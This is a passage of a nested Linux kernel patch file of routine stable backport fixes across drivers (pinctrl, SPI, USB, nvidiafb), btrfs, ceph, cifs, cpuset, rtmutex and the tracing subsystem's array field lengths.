++++ b/drivers/pinctrl/pinctrl-single.c
+@@ -372,6 +372,8 @@ static int pcs_set_mux(struct pinctrl_dev *pctldev, unsigned fselector,
+ 	if (!pcs->fmask)
+ 		return 0;
+ 	function = pinmux_generic_get_function(pctldev, fselector);
++	if (!function)
++		return -EINVAL;
+ 	func = function->data;
+ 	if (!func)
+ 		return -EINVAL;
+diff --git a/drivers/pinctrl/qcom/pinctrl-sm8450-lpass-lpi.c b/drivers/pinctrl/qcom/pinctrl-sm8450-lpass-lpi.c
+index c3c8c34148f11..e22d03ce292e7 100644
+--- a/drivers/pinctrl/qcom/pinctrl-sm8450-lpass-lpi.c
++++ b/drivers/pinctrl/qcom/pinctrl-sm8450-lpass-lpi.c
+@@ -105,7 +105,7 @@ static const struct pinctrl_pin_desc sm8450_lpi_pins[] = {
+ static const char * const swr_tx_clk_groups[] = { "gpio0" };
+ static const char * const swr_tx_data_groups[] = { "gpio1", "gpio2", "gpio14" };
+ static const char * const swr_rx_clk_groups[] = { "gpio3" };
+-static const char * const swr_rx_data_groups[] = { "gpio4", "gpio5", "gpio15" };
++static const char * const swr_rx_data_groups[] = { "gpio4", "gpio5" };
+ static const char * const dmic1_clk_groups[] = { "gpio6" };
+ static const char * const dmic1_data_groups[] = { "gpio7" };
+ static const char * const dmic2_clk_groups[] = { "gpio8" };
+diff --git a/drivers/spi/spi-dw-core.c b/drivers/spi/spi-dw-core.c
+index 99edddf9958b9..c3bfb6c84cab2 100644
+--- a/drivers/spi/spi-dw-core.c
++++ b/drivers/spi/spi-dw-core.c
+@@ -366,7 +366,7 @@ static void dw_spi_irq_setup(struct dw_spi *dws)
+ 	 * will be adjusted at the final stage of the IRQ-based SPI transfer
+ 	 * execution so not to lose the leftover of the incoming data.
+ 	 */
+-	level = min_t(u16, dws->fifo_len / 2, dws->tx_len);
++	level = min_t(unsigned int, dws->fifo_len / 2, dws->tx_len);
+ 	dw_writel(dws, DW_SPI_TXFTLR, level);
+ 	dw_writel(dws, DW_SPI_RXFTLR, level - 1);
+ 
+diff --git a/drivers/usb/core/quirks.c b/drivers/usb/core/quirks.c
+index 079e183cf3bff..934b3d997702e 100644
+--- a/drivers/usb/core/quirks.c
++++ b/drivers/usb/core/quirks.c
+@@ -526,6 +526,9 @@ static const struct usb_device_id usb_quirk_list[] = {
+ 	/* DJI CineSSD */
+ 	{ USB_DEVICE(0x2ca3, 0x0031), .driver_info = USB_QUIRK_NO_LPM },
+ 
++	/* Alcor Link AK9563 SC Reader used in 2022 Lenovo ThinkPads */
++	{ USB_DEVICE(0x2ce3, 0x9563), .driver_info = USB_QUIRK_NO_LPM },
++
+ 	/* DELL USB GEN2 */
+ 	{ USB_DEVICE(0x413c, 0xb062), .driver_info = USB_QUIRK_NO_LPM | USB_QUIRK_RESET_RESUME },
+ 
+diff --git a/drivers/usb/typec/altmodes/displayport.c b/drivers/usb/typec/altmodes/displayport.c
+index 80d8c6c3be369..3a42313d0d66e 100644
+--- a/drivers/usb/typec/altmodes/displayport.c
++++ b/drivers/usb/typec/altmodes/displayport.c
+@@ -535,10 +535,10 @@ int dp_altmode_probe(struct typec_altmode *alt)
+ 	/* FIXME: Port can only be DFP_U. */
+ 
+ 	/* Make sure we have compatiple pin configurations */
+-	if (!(DP_CAP_DFP_D_PIN_ASSIGN(port->vdo) &
+-	      DP_CAP_UFP_D_PIN_ASSIGN(alt->vdo)) &&
+-	    !(DP_CAP_UFP_D_PIN_ASSIGN(port->vdo) &
+-	      DP_CAP_DFP_D_PIN_ASSIGN(alt->vdo)))
++	if (!(DP_CAP_PIN_ASSIGN_DFP_D(port->vdo) &
++	      DP_CAP_PIN_ASSIGN_UFP_D(alt->vdo)) &&
++	    !(DP_CAP_PIN_ASSIGN_UFP_D(port->vdo) &
++	      DP_CAP_PIN_ASSIGN_DFP_D(alt->vdo)))
+ 		return -ENODEV;
+ 
+ 	ret = sysfs_create_group(&alt->dev.kobj, &dp_altmode_group);
+diff --git a/drivers/video/fbdev/nvidia/nvidia.c b/drivers/video/fbdev/nvidia/nvidia.c
+index 329e2e8133c69..a6c3bc2222463 100644
+--- a/drivers/video/fbdev/nvidia/nvidia.c
++++ b/drivers/video/fbdev/nvidia/nvidia.c
+@@ -1197,17 +1197,17 @@ static int nvidia_set_fbinfo(struct fb_info *info)
+ 	return nvidiafb_check_var(&info->var, info);
+ }
+ 
+-static u32 nvidia_get_chipset(struct fb_info *info)
++static u32 nvidia_get_chipset(struct pci_dev *pci_dev,
++			      volatile u32 __iomem *REGS)
+ {
+-	struct nvidia_par *par = info->par;
+-	u32 id = (par->pci_dev->vendor << 16) | par->pci_dev->device;
++	u32 id = (pci_dev->vendor << 16) | pci_dev->device;
+ 
+ 	printk(KERN_INFO PFX "Device ID: %x \n", id);
+ 
+ 	if ((id & 0xfff0) == 0x00f0 ||
+ 	    (id & 0xfff0) == 0x02e0) {
+ 		/* pci-e */
+-		id = NV_RD32(par->REGS, 0x1800);
++		id = NV_RD32(REGS, 0x1800);
+ 
+ 		if ((id & 0x0000ffff) == 0x000010DE)
+ 			id = 0x10DE0000 | (id >> 16);
+@@ -1220,12 +1220,11 @@ static u32 nvidia_get_chipset(struct fb_info *info)
+ 	return id;
+ }
+ 
+-static u32 nvidia_get_arch(struct fb_info *info)
++static u32 nvidia_get_arch(u32 Chipset)
+ {
+-	struct nvidia_par *par = info->par;
+ 	u32 arch = 0;
+ 
+-	switch (par->Chipset & 0x0ff0) {
++	switch (Chipset & 0x0ff0) {
+ 	case 0x0100:		/* GeForce 256 */
+ 	case 0x0110:		/* GeForce2 MX */
+ 	case 0x0150:		/* GeForce2 */
+@@ -1278,16 +1277,44 @@ static int nvidiafb_probe(struct pci_dev *pd, const struct pci_device_id *ent)
+ 	struct fb_info *info;
+ 	unsigned short cmd;
+ 	int ret;
++	volatile u32 __iomem *REGS;
++	int Chipset;
++	u32 Architecture;
+ 
+ 	NVTRACE_ENTER();
+ 	assert(pd != NULL);
+ 
++	if (pci_enable_device(pd)) {
++		printk(KERN_ERR PFX "cannot enable PCI device\n");
++		return -ENODEV;
++	}
++
++	/* enable IO and mem if not already done */
++	pci_read_config_word(pd, PCI_COMMAND, &cmd);
++	cmd |= (PCI_COMMAND_IO | PCI_COMMAND_MEMORY);
++	pci_write_config_word(pd, PCI_COMMAND, cmd);
++
++	nvidiafb_fix.mmio_start = pci_resource_start(pd, 0);
++	nvidiafb_fix.mmio_len = pci_resource_len(pd, 0);
++
++	REGS = ioremap(nvidiafb_fix.mmio_start, nvidiafb_fix.mmio_len);
++	if (!REGS) {
++		printk(KERN_ERR PFX "cannot ioremap MMIO base\n");
++		return -ENODEV;
++	}
++
++	Chipset = nvidia_get_chipset(pd, REGS);
++	Architecture = nvidia_get_arch(Chipset);
++	if (Architecture == 0) {
++		printk(KERN_ERR PFX "unknown NV_ARCH\n");
++		goto err_out;
++	}
++
+ 	ret = aperture_remove_conflicting_pci_devices(pd, "nvidiafb");
+ 	if (ret)
+-		return ret;
++		goto err_out;
+ 
+ 	info = framebuffer_alloc(sizeof(struct nvidia_par), &pd->dev);
+-
+ 	if (!info)
+ 		goto err_out;
+ 
+@@ -1298,11 +1325,6 @@ static int nvidiafb_probe(struct pci_dev *pd, const struct pci_device_id *ent)
+ 	if (info->pixmap.addr == NULL)
+ 		goto err_out_kfree;
+ 
+-	if (pci_enable_device(pd)) {
+-		printk(KERN_ERR PFX "cannot enable PCI device\n");
+-		goto err_out_enable;
+-	}
+-
+ 	if (pci_request_regions(pd, "nvidiafb")) {
+ 		printk(KERN_ERR PFX "cannot request PCI regions\n");
+ 		goto err_out_enable;
+@@ -1318,34 +1340,17 @@ static int nvidiafb_probe(struct pci_dev *pd, const struct pci_device_id *ent)
+ 	par->paneltweak = paneltweak;
+ 	par->reverse_i2c = reverse_i2c;
+ 
+-	/* enable IO and mem if not already done */
+-	pci_read_config_word(pd, PCI_COMMAND, &cmd);
+-	cmd |= (PCI_COMMAND_IO | PCI_COMMAND_MEMORY);
+-	pci_write_config_word(pd, PCI_COMMAND, cmd);
+-
+-	nvidiafb_fix.mmio_start = pci_resource_start(pd, 0);
+ 	nvidiafb_fix.smem_start = pci_resource_start(pd, 1);
+-	nvidiafb_fix.mmio_len = pci_resource_len(pd, 0);
+-
+-	par->REGS = ioremap(nvidiafb_fix.mmio_start, nvidiafb_fix.mmio_len);
+ 
+-	if (!par->REGS) {
+-		printk(KERN_ERR PFX "cannot ioremap MMIO base\n");
+-		goto err_out_free_base0;
+-	}
++	par->REGS = REGS;
+ 
+-	par->Chipset = nvidia_get_chipset(info);
+-	par->Architecture = nvidia_get_arch(info);
+-
+-	if (par->Architecture == 0) {
+-		printk(KERN_ERR PFX "unknown NV_ARCH\n");
+-		goto err_out_arch;
+-	}
++	par->Chipset = Chipset;
++	par->Architecture = Architecture;
+ 
+ 	sprintf(nvidiafb_fix.id, "NV%x", (pd->device & 0x0ff0) >> 4);
+ 
+ 	if (NVCommonSetup(info))
+-		goto err_out_arch;
++		goto err_out_free_base0;
+ 
+ 	par->FbAddress = nvidiafb_fix.smem_start;
+ 	par->FbMapSize = par->RamAmountKBytes * 1024;
+@@ -1401,7 +1406,6 @@ static int nvidiafb_probe(struct pci_dev *pd, const struct pci_device_id *ent)
+ 		goto err_out_iounmap_fb;
+ 	}
+ 
+-
+ 	printk(KERN_INFO PFX
+ 	       "PCI nVidia %s framebuffer (%dMB @ 0x%lX)\n",
+ 	       info->fix.id,
+@@ -1415,15 +1419,14 @@ err_out_iounmap_fb:
+ err_out_free_base1:
+ 	fb_destroy_modedb(info->monspecs.modedb);
+ 	nvidia_delete_i2c_busses(par);
+-err_out_arch:
+-	iounmap(par->REGS);
+- err_out_free_base0:
++err_out_free_base0:
+ 	pci_release_regions(pd);
+ err_out_enable:
+ 	kfree(info->pixmap.addr);
+ err_out_kfree:
+ 	framebuffer_release(info);
+ err_out:
++	iounmap(REGS);
+ 	return -ENODEV;
+ }
+ 
+diff --git a/fs/btrfs/tree-log.c b/fs/btrfs/tree-log.c
+index 7535857f4c8fb..e71464c0e4667 100644
+--- a/fs/btrfs/tree-log.c
++++ b/fs/btrfs/tree-log.c
+@@ -3607,17 +3607,19 @@ static noinline int insert_dir_log_key(struct btrfs_trans_handle *trans,
+ }
+ 
+ static int flush_dir_items_batch(struct btrfs_trans_handle *trans,
+-				 struct btrfs_root *log,
++				 struct btrfs_inode *inode,
+ 				 struct extent_buffer *src,
+ 				 struct btrfs_path *dst_path,
+ 				 int start_slot,
+ 				 int count)
+ {
++	struct btrfs_root *log = inode->root->log_root;
+ 	char *ins_data = NULL;
+ 	struct btrfs_item_batch batch;
+ 	struct extent_buffer *dst;
+ 	unsigned long src_offset;
+ 	unsigned long dst_offset;
++	u64 last_index;
+ 	struct btrfs_key key;
+ 	u32 item_size;
+ 	int ret;
+@@ -3675,6 +3677,19 @@ static int flush_dir_items_batch(struct btrfs_trans_handle *trans,
+ 	src_offset = btrfs_item_ptr_offset(src, start_slot + count - 1);
+ 	copy_extent_buffer(dst, src, dst_offset, src_offset, batch.total_data_size);
+ 	btrfs_release_path(dst_path);
++
++	last_index = batch.keys[count - 1].offset;
++	ASSERT(last_index > inode->last_dir_index_offset);
++
++	/*
++	 * If for some unexpected reason the last item's index is not greater
++	 * than the last index we logged, warn and return an error to fallback
++	 * to a transaction commit.
++	 */
++	if (WARN_ON(last_index <= inode->last_dir_index_offset))
++		ret = -EUCLEAN;
++	else
++		inode->last_dir_index_offset = last_index;
+ out:
+ 	kfree(ins_data);
+ 
+@@ -3724,7 +3739,6 @@ static int process_dir_items_leaf(struct btrfs_trans_handle *trans,
+ 		}
+ 
+ 		di = btrfs_item_ptr(src, i, struct btrfs_dir_item);
+-		ctx->last_dir_item_offset = key.offset;
+ 
+ 		/*
+ 		 * Skip ranges of items that consist only of dir item keys created
+@@ -3787,7 +3801,7 @@ static int process_dir_items_leaf(struct btrfs_trans_handle *trans,
+ 	if (batch_size > 0) {
+ 		int ret;
+ 
+-		ret = flush_dir_items_batch(trans, log, src, dst_path,
++		ret = flush_dir_items_batch(trans, inode, src, dst_path,
+ 					    batch_start, batch_size);
+ 		if (ret < 0)
+ 			return ret;
+@@ -4075,7 +4089,6 @@ static noinline int log_directory_changes(struct btrfs_trans_handle *trans,
+ 
+ 	min_key = BTRFS_DIR_START_INDEX;
+ 	max_key = 0;
+-	ctx->last_dir_item_offset = inode->last_dir_index_offset;
+ 
+ 	while (1) {
+ 		ret = log_dir_items(trans, inode, path, dst_path,
+@@ -4087,8 +4100,6 @@ static noinline int log_directory_changes(struct btrfs_trans_handle *trans,
+ 		min_key = max_key + 1;
+ 	}
+ 
+-	inode->last_dir_index_offset = ctx->last_dir_item_offset;
+-
+ 	return 0;
+ }
+ 
+diff --git a/fs/btrfs/tree-log.h b/fs/btrfs/tree-log.h
+index aed1e05e9879e..bcca74128c3bb 100644
+--- a/fs/btrfs/tree-log.h
++++ b/fs/btrfs/tree-log.h
+@@ -23,8 +23,6 @@ struct btrfs_log_ctx {
+ 	bool logging_new_delayed_dentries;
+ 	/* Indicate if the inode being logged was logged before. */
+ 	bool logged_before;
+-	/* Tracks the last logged dir item/index key offset. */
+-	u64 last_dir_item_offset;
+ 	struct inode *inode;
+ 	struct list_head list;
+ 	/* Only used for fast fsyncs. */
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index 65e4e887605f9..05f9cbbf6e1ef 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -408,6 +408,7 @@ void btrfs_free_device(struct btrfs_device *device)
+ static void free_fs_devices(struct btrfs_fs_devices *fs_devices)
+ {
+ 	struct btrfs_device *device;
++
+ 	WARN_ON(fs_devices->opened);
+ 	while (!list_empty(&fs_devices->devices)) {
+ 		device = list_entry(fs_devices->devices.next,
+@@ -1194,9 +1195,22 @@ void btrfs_close_devices(struct btrfs_fs_devices *fs_devices)
+ 
+ 	mutex_lock(&uuid_mutex);
+ 	close_fs_devices(fs_devices);
+-	if (!fs_devices->opened)
++	if (!fs_devices->opened) {
+ 		list_splice_init(&fs_devices->seed_list, &list);
+ 
++		/*
++		 * If the struct btrfs_fs_devices is not assembled with any
++		 * other device, it can be re-initialized during the next mount
++		 * without the needing device-scan step. Therefore, it can be
++		 * fully freed.
++		 */
++		if (fs_devices->num_devices == 1) {
++			list_del(&fs_devices->fs_list);
++			free_fs_devices(fs_devices);
++		}
++	}
++
++
+ 	list_for_each_entry_safe(fs_devices, tmp, &list, seed_list) {
+ 		close_fs_devices(fs_devices);
+ 		list_del(&fs_devices->seed_list);
+@@ -1612,7 +1626,7 @@ again:
+ 	if (ret < 0)
+ 		goto out;
+ 
+-	while (1) {
++	while (search_start < search_end) {
+ 		l = path->nodes[0];
+ 		slot = path->slots[0];
+ 		if (slot >= btrfs_header_nritems(l)) {
+@@ -1635,6 +1649,9 @@ again:
+ 		if (key.type != BTRFS_DEV_EXTENT_KEY)
+ 			goto next;
+ 
++		if (key.offset > search_end)
++			break;
++
+ 		if (key.offset > search_start) {
+ 			hole_size = key.offset - search_start;
+ 			dev_extent_hole_check(device, &search_start, &hole_size,
+@@ -1695,6 +1712,7 @@ next:
+ 	else
+ 		ret = 0;
+ 
++	ASSERT(max_hole_start + max_hole_size <= search_end);
+ out:
+ 	btrfs_free_path(path);
+ 	*start = max_hole_start;
+diff --git a/fs/btrfs/zlib.c b/fs/btrfs/zlib.c
+index b4f44662cda7c..94d06a76edb17 100644
+--- a/fs/btrfs/zlib.c
++++ b/fs/btrfs/zlib.c
+@@ -63,7 +63,7 @@ struct list_head *zlib_alloc_workspace(unsigned int level)
+ 
+ 	workspacesize = max(zlib_deflate_workspacesize(MAX_WBITS, MAX_MEM_LEVEL),
+ 			zlib_inflate_workspacesize());
+-	workspace->strm.workspace = kvmalloc(workspacesize, GFP_KERNEL);
++	workspace->strm.workspace = kvzalloc(workspacesize, GFP_KERNEL);
+ 	workspace->level = level;
+ 	workspace->buf = NULL;
+ 	/*
+diff --git a/fs/ceph/mds_client.c b/fs/ceph/mds_client.c
+index 26a0a8b9975ef..756560df3bdbd 100644
+--- a/fs/ceph/mds_client.c
++++ b/fs/ceph/mds_client.c
+@@ -3662,6 +3662,12 @@ static void handle_session(struct ceph_mds_session *session,
+ 		break;
+ 
+ 	case CEPH_SESSION_FLUSHMSG:
++		/* flush cap releases */
++		spin_lock(&session->s_cap_lock);
++		if (session->s_num_cap_releases)
++			ceph_flush_cap_releases(mdsc, session);
++		spin_unlock(&session->s_cap_lock);
++
+ 		send_flushmsg_ack(mdsc, session, seq);
+ 		break;
+ 
+diff --git a/fs/cifs/file.c b/fs/cifs/file.c
+index 209dfc06fd6d1..542f22db5f46f 100644
+--- a/fs/cifs/file.c
++++ b/fs/cifs/file.c
+@@ -3880,7 +3880,7 @@ uncached_fill_pages(struct TCP_Server_Info *server,
+ 		rdata->got_bytes += result;
+ 	}
+ 
+-	return rdata->got_bytes > 0 && result != -ECONNABORTED ?
++	return result != -ECONNABORTED && rdata->got_bytes > 0 ?
+ 						rdata->got_bytes : result;
+ }
+ 
+@@ -4656,7 +4656,7 @@ readpages_fill_pages(struct TCP_Server_Info *server,
+ 		rdata->got_bytes += result;
+ 	}
+ 
+-	return rdata->got_bytes > 0 && result != -ECONNABORTED ?
++	return result != -ECONNABORTED && rdata->got_bytes > 0 ?
+ 						rdata->got_bytes : result;
+ }
+ 
+diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h
+index ad55470a9fb97..fff61e6d6d4de 100644
+--- a/include/linux/mlx5/driver.h
++++ b/include/linux/mlx5/driver.h
+@@ -573,6 +573,14 @@ struct mlx5_debugfs_entries {
+ 	struct dentry *lag_debugfs;
+ };
+ 
++enum mlx5_func_type {
++	MLX5_PF,
++	MLX5_VF,
++	MLX5_SF,
++	MLX5_HOST_PF,
++	MLX5_FUNC_TYPE_NUM,
++};
++
+ struct mlx5_ft_pool;
+ struct mlx5_priv {
+ 	/* IRQ table valid only for real pci devices PF or VF */
+@@ -583,11 +591,10 @@ struct mlx5_priv {
+ 	struct mlx5_nb          pg_nb;
+ 	struct workqueue_struct *pg_wq;
+ 	struct xarray           page_root_xa;
+-	u32			fw_pages;
+ 	atomic_t		reg_pages;
+ 	struct list_head	free_list;
+-	u32			vfs_pages;
+-	u32			host_pf_pages;
++	u32			fw_pages;
++	u32			page_counters[MLX5_FUNC_TYPE_NUM];
+ 	u32			fw_pages_alloc_failed;
+ 	u32			give_pages_dropped;
+ 	u32			reclaim_pages_discard;
+diff --git a/include/linux/trace_events.h b/include/linux/trace_events.h
+index 20749bd9db718..04c59f8d801f1 100644
+--- a/include/linux/trace_events.h
++++ b/include/linux/trace_events.h
+@@ -270,6 +270,7 @@ struct trace_event_fields {
+ 			const int  align;
+ 			const int  is_signed;
+ 			const int  filter_type;
++			const int  len;
+ 		};
+ 		int (*define_fields)(struct trace_event_call *);
+ 	};
+diff --git a/include/trace/stages/stage4_event_fields.h b/include/trace/stages/stage4_event_fields.h
+index a8fb25f39a99d..fae467ccd0c3c 100644
+--- a/include/trace/stages/stage4_event_fields.h
++++ b/include/trace/stages/stage4_event_fields.h
+@@ -26,7 +26,8 @@
+ #define __array(_type, _item, _len) {					\
+ 	.type = #_type"["__stringify(_len)"]", .name = #_item,		\
+ 	.size = sizeof(_type[_len]), .align = ALIGN_STRUCTFIELD(_type),	\
+-	.is_signed = is_signed_type(_type), .filter_type = FILTER_OTHER },
++	.is_signed = is_signed_type(_type), .filter_type = FILTER_OTHER,\
++	.len = _len },
+ 
+ #undef __dynamic_array
+ #define __dynamic_array(_type, _item, _len) {				\
+diff --git a/include/uapi/drm/virtgpu_drm.h b/include/uapi/drm/virtgpu_drm.h
+index 0512fde5e6978..7b158fcb02b45 100644
+--- a/include/uapi/drm/virtgpu_drm.h
++++ b/include/uapi/drm/virtgpu_drm.h
+@@ -64,6 +64,7 @@ struct drm_virtgpu_map {
+ 	__u32 pad;
+ };
+ 
++/* fence_fd is modified on success if VIRTGPU_EXECBUF_FENCE_FD_OUT flag is set. */
+ struct drm_virtgpu_execbuffer {
+ 	__u32 flags;
+ 	__u32 size;
+diff --git a/include/uapi/linux/ip.h b/include/uapi/linux/ip.h
+index 874a92349bf5b..283dec7e36451 100644
+--- a/include/uapi/linux/ip.h
++++ b/include/uapi/linux/ip.h
+@@ -18,6 +18,7 @@
+ #ifndef _UAPI_LINUX_IP_H
+ #define _UAPI_LINUX_IP_H
+ #include <linux/types.h>
++#include <linux/stddef.h>
+ #include <asm/byteorder.h>
+ 
+ #define IPTOS_TOS_MASK		0x1E
+diff --git a/include/uapi/linux/ipv6.h b/include/uapi/linux/ipv6.h
+index 81f4243bebb1c..53326dfc59ecb 100644
+--- a/include/uapi/linux/ipv6.h
++++ b/include/uapi/linux/ipv6.h
+@@ -4,6 +4,7 @@
+ 
+ #include <linux/libc-compat.h>
+ #include <linux/types.h>
++#include <linux/stddef.h>
+ #include <linux/in6.h>
+ #include <asm/byteorder.h>
+ 
+diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
+index a753adcbc7c70..fac4260366208 100644
+--- a/kernel/cgroup/cpuset.c
++++ b/kernel/cgroup/cpuset.c
+@@ -1201,12 +1201,13 @@ void rebuild_sched_domains(void)
+ /**
+  * update_tasks_cpumask - Update the cpumasks of tasks in the cpuset.
+  * @cs: the cpuset in which each task's cpus_allowed mask needs to be changed
++ * @new_cpus: the temp variable for the new effective_cpus mask
+  *
+  * Iterate through each task of @cs updating its cpus_allowed to the
+  * effective cpuset's.  As this function is called with cpuset_rwsem held,
+  * cpuset membership stays stable.
+  */
+-static void update_tasks_cpumask(struct cpuset *cs)
++static void update_tasks_cpumask(struct cpuset *cs, struct cpumask *new_cpus)
+ {
+ 	struct css_task_iter it;
+ 	struct task_struct *task;
+@@ -1220,7 +1221,10 @@ static void update_tasks_cpumask(struct cpuset *cs)
+ 		if (top_cs && (task->flags & PF_KTHREAD) &&
+ 		    kthread_is_per_cpu(task))
+ 			continue;
+-		set_cpus_allowed_ptr(task, cs->effective_cpus);
++
++		cpumask_and(new_cpus, cs->effective_cpus,
++			    task_cpu_possible_mask(task));
++		set_cpus_allowed_ptr(task, new_cpus);
+ 	}
+ 	css_task_iter_end(&it);
+ }
+@@ -1505,7 +1509,7 @@ static int update_parent_subparts_cpumask(struct cpuset *cs, int cmd,
+ 	spin_unlock_irq(&callback_lock);
+ 
+ 	if (adding || deleting)
+-		update_tasks_cpumask(parent);
++		update_tasks_cpumask(parent, tmp->new_cpus);
+ 
+ 	/*
+ 	 * Set or clear CS_SCHED_LOAD_BALANCE when partcmd_update, if necessary.
+@@ -1657,7 +1661,7 @@ update_parent_subparts:
+ 		WARN_ON(!is_in_v2_mode() &&
+ 			!cpumask_equal(cp->cpus_allowed, cp->effective_cpus));
+ 
+-		update_tasks_cpumask(cp);
++		update_tasks_cpumask(cp, tmp->new_cpus);
+ 
+ 		/*
+ 		 * On legacy hierarchy, if the effective cpumask of any non-
+@@ -2305,7 +2309,7 @@ static int update_prstate(struct cpuset *cs, int new_prs)
+ 		}
+ 	}
+ 
+-	update_tasks_cpumask(parent);
++	update_tasks_cpumask(parent, tmpmask.new_cpus);
+ 
+ 	if (parent->child_ecpus_count)
+ 		update_sibling_cpumasks(parent, cs, &tmpmask);
+@@ -3318,7 +3322,7 @@ hotplug_update_tasks_legacy(struct cpuset *cs,
+ 	 * as the tasks will be migrated to an ancestor.
+ 	 */
+ 	if (cpus_updated && !cpumask_empty(cs->cpus_allowed))
+-		update_tasks_cpumask(cs);
++		update_tasks_cpumask(cs, new_cpus);
+ 	if (mems_updated && !nodes_empty(cs->mems_allowed))
+ 		update_tasks_nodemask(cs);
+ 
+@@ -3355,7 +3359,7 @@ hotplug_update_tasks(struct cpuset *cs,
+ 	spin_unlock_irq(&callback_lock);
+ 
+ 	if (cpus_updated)
+-		update_tasks_cpumask(cs);
++		update_tasks_cpumask(cs, new_cpus);
+ 	if (mems_updated)
+ 		update_tasks_nodemask(cs);
+ }
+diff --git a/kernel/locking/rtmutex.c b/kernel/locking/rtmutex.c
+index 010cf4e6d0b8f..728f434de2bbf 100644
+--- a/kernel/locking/rtmutex.c
++++ b/kernel/locking/rtmutex.c
+@@ -901,8 +901,9 @@ static int __sched rt_mutex_adjust_prio_chain(struct task_struct *task,
+ 		 * then we need to wake the new top waiter up to try
+ 		 * to get the lock.
+ 		 */
+-		if (prerequeue_top_waiter != rt_mutex_top_waiter(lock))
+-			wake_up_state(waiter->task, waiter->wake_state);
++		top_waiter = rt_mutex_top_waiter(lock);
++		if (prerequeue_top_waiter != top_waiter)
++			wake_up_state(top_waiter->task, top_waiter->wake_state);
+ 		raw_spin_unlock_irq(&lock->wait_lock);
+ 		return 0;
+ 	}
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 546e84ae9993b..a387bdc6af013 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -9144,9 +9144,6 @@ buffer_percent_write(struct file *filp, const char __user *ubuf,
+ 	if (val > 100)
+ 		return -EINVAL;
+ 
+-	if (!val)
+-		val = 1;
+-
+ 	tr->buffer_percent = val;
+ 
+ 	(*ppos)++;
+diff --git a/kernel/trace/trace.h b/kernel/trace/trace.h
+index 9e931f51328a2..ac7af03ce8372 100644
+--- a/kernel/trace/trace.h
++++ b/kernel/trace/trace.h
+@@ -1282,6 +1282,7 @@ struct ftrace_event_field {
+ 	int			offset;
+ 	int			size;
+ 	int			is_signed;
++	int			len;
+ };
+ 
+ struct prog_entry;
+diff --git a/kernel/trace/trace_events.c b/kernel/trace/trace_events.c
+index f71ea6e79b3c8..2a2ea9b6f7625 100644
+--- a/kernel/trace/trace_events.c
++++ b/kernel/trace/trace_events.c
+@@ -114,7 +114,7 @@ trace_find_event_field(struct trace_event_call *call, char *name)
+ 
+ static int __trace_define_field(struct list_head *head, const char *type,
+ 				const char *name, int offset, int size,
+-				int is_signed, int filter_type)
++				int is_signed, int filter_type, int len)
+ {
+ 	struct ftrace_event_field *field;
+ 
+@@ -133,6 +133,7 @@ static int __trace_define_field(struct list_head *head, const char *type,
+ 	field->offset = offset;
+ 	field->size = size;
+ 	field->is_signed = is_signed;
++	field->len = len;
+ 
+ 	list_add(&field->link, head);
+ 
+@@ -150,14 +151,28 @@ int trace_define_field(struct trace_event_call *call, const char *type,
+ 
+ 	head = trace_get_fields(call);
+ 	return __trace_define_field(head, type, name, offset, size,
+-				    is_signed, filter_type);
++				    is_signed, filter_type, 0);
+ }
+ EXPORT_SYMBOL_GPL(trace_define_field);
+ 
++int trace_define_field_ext(struct trace_event_call *call, const char *type,
++		       const char *name, int offset, int size, int is_signed,
++		       int filter_type, int len)
++{
++	struct list_head *head;
++
++	if (WARN_ON(!call->class))
++		return 0;
++
++	head = trace_get_fields(call);
++	return __trace_define_field(head, type, name, offset, size,
++				    is_signed, filter_type, len);
++}
++
+ #define __generic_field(type, item, filter_type)			\
+ 	ret = __trace_define_field(&ftrace_generic_fields, #type,	\
+ 				   #item, 0, 0, is_signed_type(type),	\
+-				   filter_type);			\
++				   filter_type, 0);			\
+ 	if (ret)							\
+ 		return ret;
+ 
+@@ -166,7 +181,7 @@ EXPORT_SYMBOL_GPL(trace_define_field);
+ 				   "common_" #item,			\
+ 				   offsetof(typeof(ent), item),		\
+ 				   sizeof(ent.item),			\
+-				   is_signed_type(type), FILTER_OTHER);	\
++				   is_signed_type(type), FILTER_OTHER, 0);	\
+ 	if (ret)							\
+ 		return ret;
+ 
+@@ -1588,12 +1603,17 @@ static int f_show(struct seq_file *m, void *v)
+ 		seq_printf(m, "\tfield:%s %s;\toffset:%u;\tsize:%u;\tsigned:%d;\n",
+ 			   field->type, field->name, field->offset,
+ 			   field->size, !!field->is_signed);
+-	else
+-		seq_printf(m, "\tfield:%.*s %s%s;\toffset:%u;\tsize:%u;\tsigned:%d;\n",
++	else if (field->len)
++		seq_printf(m, "\tfield:%.*s %s[%d];\toffset:%u;\tsize:%u;\tsigned:%d;\n",
+ 			   (int)(array_descriptor - field->type),
+ 			   field->type, field->name,
+-			   array_descriptor, field->offset,
++			   field->len, field->offset,
+ 			   field->size, !!field->is_signed);
++	else
++		seq_printf(m, "\tfield:%.*s %s[];\toffset:%u;\tsize:%u;\tsigned:%d;\n",
++				(int)(array_descriptor - field->type),
++				field->type, field->name,
++				field->offset, field->size, !!field->is_signed);
+ 
+ 	return 0;
+ }
+@@ -2379,9 +2399,10 @@ event_define_fields(struct trace_event_call *call)
+ 			}
+ 
+ 			offset = ALIGN(offset, field->align);
+-			ret = trace_define_field(call, field->type, field->name,
++			ret = trace_define_field_ext(call, field->type, field->name,
+ 						 offset, field->size,
+-						 field->is_signed, field->filter_type);
++						 field->is_signed, field->filter_type,
++						 field->len);
+ 			if (WARN_ON_ONCE(ret)) {
+ 				pr_err("error code is %d\n", ret);
+ 				break;
+diff --git a/kernel/trace/trace_export.c b/kernel/trace/trace_export.c
+index d960f6b11b5e5..58f3946081e21 100644
+--- a/kernel/trace/trace_export.c
++++ b/kernel/trace/trace_export.c
+@@ -111,7 +111,8 @@ static void __always_unused ____ftrace_check_##name(void)		\
+ #define __array(_type, _item, _len) {					\
+ 	.type = #_type"["__stringify(_len)"]", .name = #_item,		\
+ 	.size = sizeof(_type[_len]), .align = __alignof__(_type),	\
+-	is_signed_type(_type), .filter_type = FILTER_OTHER },
++	is_signed_type(_type), .filter_type = FILTER_OTHER,			\
++	.len = _len },
+ 
+ #undef __array_desc
+ #define __array_desc(_type, _container, _item, _len) __array(_type, _item, _len)
+diff --git a/mm/page_alloc.c b/mm/page_alloc.c
